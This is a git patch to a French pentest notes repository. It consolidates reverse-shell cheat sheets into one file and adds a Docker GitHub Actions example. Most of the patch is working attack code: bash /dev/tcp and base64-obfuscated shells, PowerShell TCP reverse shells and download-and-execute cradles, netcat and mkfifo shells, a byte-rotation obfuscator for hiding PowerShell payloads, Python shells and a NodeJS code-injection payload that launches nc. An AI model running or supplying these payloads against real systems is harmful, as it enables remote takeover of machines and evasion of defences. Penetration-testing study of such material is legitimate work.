From da60efad3cacf462dfd1d6ef3f188dbf76cf251b Mon Sep 17 00:00:00 2001
From: "Taisen.fr (Dev)" <vaca@hotmail.fr>
Date: Tue, 12 Nov 2024 10:43:50 +0100
Subject: [PATCH] Merge ReverseShell + Docker actions + NetExec

---
 Dojo-101-DevSec/Docker.md                     |  37 +++
 .../1-RECON-SCAN-ENUM/Windows-AD-et SMB.md    |   8 +-
 .../Powershell-reverseshell.md                |  16 --
 .../Python-Linux-reverse-Shell.md             |  34 ---
 .../2-WEAPON-EXPLOIT/ReverseShell.md          | 232 ++++++++++++++++++
 .../2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md  |   6 -
 .../2-WEAPON-EXPLOIT/bash-reverse-shell.md    |  24 --
 Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md   |  65 -----
 .../2-WEAPON-EXPLOIT/powershell-payload.md    |  64 -----
 9 files changed, 276 insertions(+), 210 deletions(-)
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md
 create mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md
 delete mode 100644 Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md

diff --git a/Dojo-101-DevSec/Docker.md b/Dojo-101-DevSec/Docker.md
index 36b5932..d15ef2a 100644
--- a/Dojo-101-DevSec/Docker.md
+++ b/Dojo-101-DevSec/Docker.md
@@ -188,6 +188,43 @@ docker build .
 
 l'image est ensuite ajouté (`docker image ls`)
 
+Exemple de build via github acitons : 
+
+```yml
+name: Docker
+
+on:
+  push:
+    branches:
+      - main
+  pull_request:
+    branches:
+      - main
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout code
+      uses: actions/checkout@v2
+
+    - name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v1
+
+    - name: Build Docker image
+      run: docker build -t vulnerablelightapp .
+
+    - name: Run Docker container
+      run: docker run -d -p 3000:3000 vulnerablelightapp
+
+    - name: Wait for the container to be ready
+      run: sleep 30
+
+    - name: Test the application
+      run: curl -k https://127.0.0.1:3000
+```
+
 
 ## Docker Compose
 
diff --git a/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md b/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md
index 8e926b1..724af3a 100644
--- a/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md	
+++ b/Dojo-101-Pentest/1-RECON-SCAN-ENUM/Windows-AD-et SMB.md	
@@ -1,8 +1,14 @@
 # Windows AD et SMB (reseau)
 
+
+## Netexec
+
+[NetExec](https://github.com/Pennyw0rth/NetExec)
+
+
 ## Responder
 
-[Projet](https://github.com/lgandx/Responder)
+[Responder](https://github.com/lgandx/Responder)
 
 ### llmnr et netbios spoofing, netLM interception
 
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md
deleted file mode 100644
index b1d7dd5..0000000
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Powershell-reverseshell.md
+++ /dev/null
@@ -1,16 +0,0 @@
-# powershell reverseshell
-
-## classique
-
-```pwsh
-$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
-```
-
-
-## sans prompt:
-
-```powershell
-$client=New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String )$sendback2  = $sendback ;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
-```
-
-
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md
deleted file mode 100644
index 82ea002..0000000
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Python-Linux-reverse-Shell.md
+++ /dev/null
@@ -1,34 +0,0 @@
-# Linux_reverseShell
-## msfvenom
-msfvenom -p cmd/unix/reverse_python LHOST=10.10.13.149 LPORT=10443 -f raw 
-
-[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
-[-] No arch selected, selecting arch: cmd from the payload
-No encoder or badchars specified, outputting raw payload
-Payload size: 525 bytes
-python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zICAgICA7ICAgIGhvc3Q9IjEwLjEwLjEzLjE0OSIgICAgIDsgICAgcG9ydD0xMDQ0MyAgICAgOyAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICwgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QgICAgICwgICAgcG9ydCkpICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKSAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAgMSkgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAsICAgIDIpICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
-
-
-## a la main:
-python -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect( ("192.168.1.20",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call( ["/bin/sh","-i"] );'
-
-
-## URL ENCODE:
-
->>> import urllib.parse
->>> urllib.parse.quote(shell)
-'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.13.149%22%2C10443%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22/bin/sh%22%2C%22-i%22%5D%29%29%3B'
-
-
-
-## injection avec eval(..):
-
-'__import__("os").system("nc 10.10.13.149 10443 -e /bin/sh").read()'
-
-'__import__(\"os\").system(\"nc 10.10.13.149 10443 -e /bin/sh").read()
-
-## shell simple
-#!/usr/bin/env python
-import os
-os.system('/bin/bash')
-
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md
new file mode 100644
index 0000000..f4ef3ad
--- /dev/null
+++ b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/ReverseShell.md
@@ -0,0 +1,232 @@
+# Reverseshell
+
+### Ressources
+
+[ReverseShell générator](https://www.revshells.com/)
+
+## Bash
+
+### Certaines versions de Bash permettent de transmettre un reverse-shell  via « /dev/tcp/ » ou « /dev/udp/ » (version compilée avec le drapeau  « –enable-net-redirections »).
+
+```sh
+bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
+
+exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done
+
+exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0
+
+0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
+
+echo "/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'" >  file 
+
+echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.131/443 0>&1'" > /usr/local/bin/run-parts
+
+'echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMy4yNS80NDMgMD4mMQ==|base64${IFS}-d|bash;'
+```
+
+
+## powershell
+
+### classique
+
+```pwsh
+$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+
+### sans prompt:
+
+```powershell
+$client=New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String )$sendback2  = $sendback ;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+### reverseshell
+
+```powershell
+$rs = '
+$c=nEw-OBJeCt SYsTEm.nET.SOcKetS.tcpcLIENT((wRiTe-oUtpuT 127.0.0.1),10443);$s=$c.gETsTrEaM();[BYtE[]]$b=0..65535|%{0};wHILe(($i=$s.rEAd($b,0,$b.LENgTh))-NE0){$a=(NEw-oBJeCT -tYPenAME sYSteM.tEXT.aScIieNcOdInG).gETsTRIng($b,0,$i);$k=(iEX $a 2>&1|oUt-stRInG);$z=$k+(WrITe-OuTPut `>);$d=([teXT.eNcODiNg]::aSCii).gETByTEs($z);$s.wRiTE($d,0,$d.LEnGtH);$s.fLuSH()};$c.cLoSE()
+'
+```
+
+### Download
+
+```powershell
+powershell -c "iex(New-Object Net.WebClient).DownloadString('http://10.9.2.43:8000/script.ps1')"
+
+powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.1.214:8000/myshell.exe','myshell.exe')"
+```
+
+### Executer directement
+
+```powershell
+(iwr <IP>).content |Iex
+```
+
+
+
+## netcat
+
+### reverseshell
+
+Notes : selon les versions `-c` remplace `-e`
+
+```sh
+nc 10.0.0.1 1234 -e /bin/sh
+nc 10.0.0.1 1234 -e cmd.exe
+nc -e /bin/sh 10.0.0.1 1234
+```
+
+### listener
+ 
+```sh
+nc -nvlp 443
+```
+
+### file transfert
+
+alice:
+
+```sh
+nc -lnvp 10443 < lse.sh
+```
+
+bob:
+
+```sh
+nc IP 10443 > lse.sh
+```
+
+### bind shell
+
+```sh
+nc -l -p <port> -e /bin/bash
+```
+
+### sans options
+
+victime
+
+```sh
+mknod /tmp/backpipe p 
+/bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
+```
+
+### nc traditional: 
+
+```sh
+/usr/bin/nc.traditional
+```
+
+### Windows
+
+```powershell
+powershell -c “iwr http://10.10.14.4:8000/nc64.exe -outfile c:\temp/nc64.exe”
+c:\temp\nc64.exe 10.10.14.4 10443 -e powershell
+```
+
+### mkfifo
+
+```sh
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
+```
+
+
+## Powrshell obfusquer le payload
+
+```powershell
+[byte[]] $scriptBytes = [system.Text.Encoding]::UTF8.GetBytes($rs)
+
+#byte rotation
+$rot = Get-Random -Maximum 254 -Minimum 5
+$derot = 255 - $rot
+$rotbytes = [system.Text.Encoding]::UTF8.GetBytes('')
+$scriptBytes | %{ $rotbytes += ($_ + $rot)%255}
+
+
+#payload in byte without rotation here:
+#$output = ""
+#$scriptBytes |% {$output += $_.tostring()+ ","}
+#$output = $output -replace ".$"
+#$output =  "[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$([bYtE]" + $output + "))|IEx"
+#write-host $output
+
+#payload in byte WITH rotation:
+$output = ""
+$rotBytes |% {$output += $_.tostring()+ ","}
+$output = $output -replace ".$"
+
+$rand1 = Get-Random -Maximum 254 -Minimum 5 ; $rand2 = Get-Random -Maximum 254 -Minimum 5 ; $rand3 = Get-Random -Maximum 254 -Minimum 5
+
+#$output =  "`$([bYtE]" + $output + ")" #objet de type byte
+#$output =  "`$d;`$([bYtE]" + $output + ")|%{ `$d+=(`$_ + $rot)%255};`$d" #payload déchiffré
+#$output =  "`$255=[system.Text.Encoding]::UTF8.GetBytes('');[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+$derot)%255};`$255))|iEx"
+#$output =  "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];`$255=`$133::utF8.gEtbYtES('');`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx"
+#$output =  "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$255='';`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" #erreur non bloquante à ;[BytE[]]`$255=''
+$output =  "`$$rand2=255;`$$rand1=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$$rand3='';`$$rand1::asCii.gEtsTRiNG(`$(([bYtE]" + $output + ")|%{`$$rand3+=(`$_+(`$$rand2+$derot))%`$$rand2};`$$rand3))|iEx"
+
+write-host $output
+```
+
+## msfvenom
+
+```sh
+msfvenom -p cmd/unix/reverse_python LHOST=10.10.13.149 LPORT=10443 -f raw 
+
+[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
+[-] No arch selected, selecting arch: cmd from the payload
+No encoder or badchars specified, outputting raw payload
+Payload size: 525 bytes
+python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICBzdWJwcm9jZXNzICAgICAsICAgIG9zICAgICA7ICAgIGhvc3Q9IjEwLjEwLjEzLjE0OSIgICAgIDsgICAgcG9ydD0xMDQ0MyAgICAgOyAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICwgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QgICAgICwgICAgcG9ydCkpICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAwKSAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAgMSkgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAsICAgIDIpICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
+```
+
+## python
+
+```python
+python -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect( ("192.168.1.20",1234)); os.dup2 (s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call( ["/bin/sh","-i"] );'
+```
+
+```python
+import os,socket,subprocess,threading;
+def s2p(s, p):
+    while True:
+        data = s.recv(1024)
+        if len(data) > 0:
+            p.stdin.write(data)
+
+def p2s(s, p):
+    while True:
+        s.send(p.stdout.read(1))
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.1.20",4444))
+
+p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
+
+s2p_thread = threading.Thread(target=s2p, args=[s, p])
+s2p_thread.daemon = True
+s2p_thread.start()
+
+p2s_thread = threading.Thread(target=p2s, args=[s, p])
+p2s_thread.daemon = True
+p2s_thread.start()
+
+try:
+    p.wait()
+except KeyboardInterrupt:
+    s.close()
+```
+
+
+
+### exemple d'injection python avec eval(..):
+
+```python
+__import__("os").system("nc 10.10.13.149 10443 -e /bin/sh").read()
+__import__(\"os\").system(\"nc 10.10.13.149 10443 -e /bin/sh").read()
+```
+
+## NodeJS
+
+```bash
+curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"nc -e /bin/bash 127.0.0.1 1234\"); //"}'
+```
\ No newline at end of file
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md
index 84e8373..1d9d250 100644
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md
+++ b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/Web-Injection-NodeJS.md
@@ -49,10 +49,4 @@ curl -X POST http://167.99.88.216:32153/admin -d '{"key":"\"); const { exec } =
 ```bash
 curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"ping -c 3 127.0.0.1\"); //"}'
 sudo tcpdump -i lo icmp
-```
-
-### ReverseShell
-
-```bash
-curl http://127.0.0.1:21440/admin -X POST -d '{"key":"\"); const { exec } = require(\"child_process\"); exec(\"nc -e /bin/bash 127.0.0.1 1234\"); //"}'
 ```
\ No newline at end of file
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md
deleted file mode 100644
index 339420c..0000000
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/bash-reverse-shell.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# bash reverseshell
-
-### Certaines versions de Bash permettent de transmettre un reverse-shell  via « /dev/tcp/ » ou « /dev/udp/ » (version compilée avec le drapeau  « –enable-net-redirections »).
-
-```sh
-bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
-
-exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done
-
-exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0
-
-0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
-```
-
-## le meilleur:
-
-```sh
-echo "/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'" >  file 
-
-echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.13.131/443 0>&1'" > /usr/local/bin/run-parts
-
-### obfuscation base 64: (bash -i >& /dev/tcp/10.10.13.25/443 0>&1)
-'echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMy4yNS80NDMgMD4mMQ==|base64${IFS}-d|bash;'
-```
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md
deleted file mode 100644
index 21be3c5..0000000
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/netcat.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# netcat
-
-## reverseshell
-
-Notes : selon les versions `-c` remplace `-e`
-
-```sh
-nc 10.0.0.1 1234 -e /bin/sh
-nc 10.0.0.1 1234 -e cmd.exe
-nc -e /bin/sh 10.0.0.1 1234
-```
-
-## listener
-
-```sh
-nc -nvlp 443
-```
-
-## file transfert
-
-alice:
-
-```sh
-nc -lnvp 10443 < lse.sh
-```
-
-bob:
-
-```sh
-nc IP 10443 > lse.sh
-```
-
-## bind shell
-
-```sh
-nc -l -p <port> -e /bin/bash
-```
-
-## sans options
-
-victime
-
-```sh
-mknod /tmp/backpipe p 
-/bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
-```
-
-## nc traditional: 
-
-```sh
-/usr/bin/nc.traditional
-```
-
-## Windows
-
-```powershell
-powershell -c “iwr http://10.10.14.4:8000/nc64.exe -outfile c:\temp/nc64.exe”
-c:\temp\nc64.exe 10.10.14.4 10443 -e powershell
-```
-
-## mkfifo
-
-```sh
-rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
-```
diff --git a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md b/Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md
deleted file mode 100644
index 3e8bfb5..0000000
--- a/Dojo-101-Pentest/2-WEAPON-EXPLOIT/powershell-payload.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# Powrshell obfusquer le payload
-
-
-## Download
-
-```powershell
-powershell -c "iex(New-Object Net.WebClient).DownloadString('http://10.9.2.43:8000/script.ps1')"
-
-powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.1.214:8000/myshell.exe','myshell.exe')"
-```
-
-## Executer directement
-
-```powershell
-(iwr <IP>).content |Iex
-```
-
-
-## reverseshell
-
-```powershell
-$rs = '
-$c=nEw-OBJeCt SYsTEm.nET.SOcKetS.tcpcLIENT((wRiTe-oUtpuT 127.0.0.1),10443);$s=$c.gETsTrEaM();[BYtE[]]$b=0..65535|%{0};wHILe(($i=$s.rEAd($b,0,$b.LENgTh))-NE0){$a=(NEw-oBJeCT -tYPenAME sYSteM.tEXT.aScIieNcOdInG).gETsTRIng($b,0,$i);$k=(iEX $a 2>&1|oUt-stRInG);$z=$k+(WrITe-OuTPut `>);$d=([teXT.eNcODiNg]::aSCii).gETByTEs($z);$s.wRiTE($d,0,$d.LEnGtH);$s.fLuSH()};$c.cLoSE()
-'
-```
-
-
-## to bytes
-
-
-```powershell
-[byte[]] $scriptBytes = [system.Text.Encoding]::UTF8.GetBytes($rs)
-
-#byte rotation
-$rot = Get-Random -Maximum 254 -Minimum 5
-$derot = 255 - $rot
-$rotbytes = [system.Text.Encoding]::UTF8.GetBytes('')
-$scriptBytes | %{ $rotbytes += ($_ + $rot)%255}
-
-
-#payload in byte without rotation here:
-#$output = ""
-#$scriptBytes |% {$output += $_.tostring()+ ","}
-#$output = $output -replace ".$"
-#$output =  "[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$([bYtE]" + $output + "))|IEx"
-#write-host $output
-
-#payload in byte WITH rotation:
-$output = ""
-$rotBytes |% {$output += $_.tostring()+ ","}
-$output = $output -replace ".$"
-
-$rand1 = Get-Random -Maximum 254 -Minimum 5 ; $rand2 = Get-Random -Maximum 254 -Minimum 5 ; $rand3 = Get-Random -Maximum 254 -Minimum 5
-
-#$output =  "`$([bYtE]" + $output + ")" #objet de type byte
-#$output =  "`$d;`$([bYtE]" + $output + ")|%{ `$d+=(`$_ + $rot)%255};`$d" #payload déchiffré
-#$output =  "`$255=[system.Text.Encoding]::UTF8.GetBytes('');[sYsTeM.TeXT.eNcOdInG]::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+$derot)%255};`$255))|iEx"
-#$output =  "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];`$255=`$133::utF8.gEtbYtES('');`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx"
-#$output =  "`$0=255;`$133=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$255='';`$133::asCii.gEtsTRiNG(`$(`$([bYtE]" + $output + ")|%{`$255+=(`$_+(255+$derot-255))%`$0};`$255))|iEx" #erreur non bloquante à ;[BytE[]]`$255=''
-$output =  "`$$rand2=255;`$$rand1=[sYsTeM.TeXT.eNcOdInG];[BytE[]]`$$rand3='';`$$rand1::asCii.gEtsTRiNG(`$(([bYtE]" + $output + ")|%{`$$rand3+=(`$_+(`$$rand2+$derot))%`$$rand2};`$$rand3))|iEx"
-
-write-host $output
-```
-